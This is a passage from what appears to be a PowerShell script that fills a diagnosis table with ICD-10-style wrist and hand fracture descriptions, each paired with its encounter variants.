process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, left wrist","Displaced fracture of hook process of hamate [unciform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Displaced fracture of hook process of hamate [unciform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist","Nondisplaced fracture of hook process of hamate [unciform] bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, right wrist","Displaced fracture of pisiform, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, left wrist","Displaced fracture of pisiform, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of pisiform, unspecified wrist","Displaced fracture of pisiform, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, right wrist","Nondisplaced fracture of pisiform, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, left wrist","Nondisplaced fracture of pisiform, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of pisiform, unspecified wrist","Nondisplaced fracture of pisiform, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], right wrist","Displaced fracture of trapezium [larger multangular], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], left wrist","Displaced fracture of trapezium [larger multangular], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezium [larger multangular], unspecified wrist","Displaced fracture of trapezium [larger multangular], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], right wrist","Nondisplaced fracture of trapezium [larger multangular], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], left wrist","Nondisplaced fracture of trapezium [larger multangular], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezium [larger multangular], unspecified wrist","Nondisplaced fracture of trapezium [larger multangular], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], right wrist","Displaced fracture of trapezoid [smaller multangular], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], left wrist","Displaced fracture of trapezoid [smaller multangular], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of trapezoid [smaller multangular], unspecified wrist","Displaced fracture of trapezoid [smaller multangular], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], right wrist","Nondisplaced fracture of trapezoid [smaller multangular], right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], left wrist","Nondisplaced fracture of trapezoid [smaller multangular], left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist","Nondisplaced fracture of trapezoid [smaller multangular], unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, right hand","Unspecified fracture of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, left hand","Unspecified fracture of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first metacarpal bone, unspecified hand","Unspecified fracture of first 